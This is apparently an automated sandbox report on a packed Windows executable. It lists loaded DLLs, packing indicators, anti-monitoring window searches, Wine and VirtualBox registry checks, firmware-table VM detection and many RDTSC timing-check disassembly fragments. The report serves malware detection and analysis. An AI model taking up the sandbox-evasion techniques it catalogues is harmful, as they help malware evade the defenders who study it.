Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: NAnOVCOt4L.exe

Static file information: File size 2875392 > 1048576

Source: NAnOVCOt4L.exe

Static PE information: Raw size of nwoikvrs is bigger than: 0x100000 < 0x296000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Unpacked PE file: 0.2.NAnOVCOt4L.exe.30000.0.unpack :EW;.rsrc :W;.idata :W;nwoikvrs:EW;xechgvpa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nwoikvrs:EW;xechgvpa:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: NAnOVCOt4L.exe

Static PE information: real checksum: 0x2bf7e8 should be: 0x2c02f3

Source: NAnOVCOt4L.exe	Static PE information: section name:
Source: NAnOVCOt4L.exe	Static PE information: section name: .rsrc
Source: NAnOVCOt4L.exe	Static PE information: section name: .idata
Source: NAnOVCOt4L.exe	Static PE information: section name: nwoikvrs
Source: NAnOVCOt4L.exe	Static PE information: section name: xechgvpa
Source: NAnOVCOt4L.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Code function: 0_3_01517E90 push esp; retf	0_3_01517E91
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Code function: 0_3_01517E90 push esp; retf	0_3_01517E91
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Code function: 0_3_01532E78 push edi; retf	0_3_01532E8B
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Code function: 0_3_01517E90 push esp; retf	0_3_01517E91

Source: NAnOVCOt4L.exe

Static PE information: section name: entropy: 7.980998482976636

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87B70 second address: 87B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87B74 second address: 87B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6035561AE3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87B9D second address: 87BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87BA1 second address: 87BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87BA7 second address: 87BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 87BAD second address: 87BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FAE2D second address: 1FAE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FAE31 second address: 1FAE37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1EE4D7 second address: 1EE519 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6034D241C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6034D241D7h 0x00000012 jmp 00007F6034D241D0h 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F6034D241CBh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1F9EDA second address: 1F9EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FA16C second address: 1FA17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F6034D241C6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FA2F3 second address: 1FA301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6035561ADAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FA44C second address: 1FA454 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FA59F second address: 1FA5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FA5A3 second address: 1FA5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FC89B second address: 87B74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 0C7827C3h 0x0000000e jc 00007F6035561ADBh 0x00000014 adc dx, 64DBh 0x00000019 push dword ptr [ebp+122D1259h] 0x0000001f mov dword ptr [ebp+122D23ACh], eax 0x00000025 call dword ptr [ebp+122D241Bh] 0x0000002b pushad 0x0000002c pushad 0x0000002d sub eax, 01C64CB9h 0x00000033 mov ecx, dword ptr [ebp+122D3A06h] 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c mov dword ptr [ebp+122D238Ch], esi 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 mov dword ptr [ebp+122D238Ch], ecx 0x0000004c mov dword ptr [ebp+122D3A06h], eax 0x00000052 pushad 0x00000053 jmp 00007F6035561AE8h 0x00000058 mov edx, dword ptr [ebp+122D3A72h] 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 jmp 00007F6035561ADDh 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d sub dword ptr [ebp+122D2435h], edi 0x00000073 lodsw 0x00000075 pushad 0x00000076 clc 0x00000077 jmp 00007F6035561ADFh 0x0000007c popad 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 sub dword ptr [ebp+122D2435h], edi 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b pushad 0x0000008c mov bx, 1A04h 0x00000090 popad 0x00000091 nop 0x00000092 push eax 0x00000093 push edx 0x00000094 ja 00007F6035561ADCh 0x0000009a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FC8E8 second address: 1FC8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FC8EC second address: 1FC9E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6035561AE5h 0x0000000d nop 0x0000000e xor esi, 4312EC8Ah 0x00000014 push 00000000h 0x00000016 jmp 00007F6035561AE6h 0x0000001b push 8CEA3E46h 0x00000020 jmp 00007F6035561AE5h 0x00000025 add dword ptr [esp], 7315C23Ah 0x0000002c mov dword ptr [ebp+122D2397h], ebx 0x00000032 push 00000003h 0x00000034 mov esi, dword ptr [ebp+122D37E6h] 0x0000003a push 00000000h 0x0000003c call 00007F6035561AE4h 0x00000041 xor edi, 6ECDB9CAh 0x00000047 pop edx 0x00000048 mov edx, dword ptr [ebp+122D3896h] 0x0000004e push 00000003h 0x00000050 mov dword ptr [ebp+122D2392h], ecx 0x00000056 call 00007F6035561AD9h 0x0000005b jmp 00007F6035561AE2h 0x00000060 push eax 0x00000061 jnp 00007F6035561AE7h 0x00000067 mov eax, dword ptr [esp+04h] 0x0000006b jmp 00007F6035561AE8h 0x00000070 mov eax, dword ptr [eax] 0x00000072 jnc 00007F6035561ADCh 0x00000078 mov dword ptr [esp+04h], eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 pop eax 0x00000081 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FC9E8 second address: 1FC9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FC9EC second address: 1FCA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6035561ADDh 0x0000000d lea ebx, dword ptr [ebp+124487EEh] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F6035561AD8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push ecx 0x0000002e mov cl, B6h 0x00000030 pop edi 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 jns 00007F6035561AD6h 0x0000003a pop eax 0x0000003b pop eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCA42 second address: 1FCA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCA46 second address: 1FCA62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561AE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCAA4 second address: 1FCAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCAA8 second address: 1FCAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCC49 second address: 1FCCBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 70236396h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F6034D241C8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov ecx, 17287DDDh 0x0000002f push 00000003h 0x00000031 mov di, bx 0x00000034 push 00000000h 0x00000036 mov di, FD94h 0x0000003a jnc 00007F6034D241CCh 0x00000040 push 00000003h 0x00000042 sbb edx, 25293700h 0x00000048 call 00007F6034D241C9h 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCCBC second address: 1FCCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6035561AD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCCC7 second address: 1FCCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6034D241C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCCD1 second address: 1FCD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F6035561AE4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F6035561AE9h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jl 00007F6035561ADEh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCD24 second address: 1FCD48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jno 00007F6034D241CCh 0x0000000e lea ebx, dword ptr [ebp+12448802h] 0x00000014 push eax 0x00000015 pushad 0x00000016 je 00007F6034D241CCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1FCD48 second address: 1FCD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F6035561AE7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 1F34C6 second address: 1F34CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21ADD3 second address: 21ADE4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6035561AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21AF4C second address: 21AF50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21AF50 second address: 21AF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21AF54 second address: 21AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21AF5C second address: 21AF78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6035561AE6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B0A0 second address: 21B0BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6034D241D7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B0BD second address: 21B0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6035561AD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B0C7 second address: 21B0CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B3B2 second address: 21B3D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6035561ADEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6035561AE1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B54E second address: 21B560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6034D241C6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B560 second address: 21B57D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6035561AE7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B995 second address: 21B99B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21B99B second address: 21B9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21BB0D second address: 21BB13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	RDTSC instruction interceptor: First address: 21BB13 second address: 21BB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
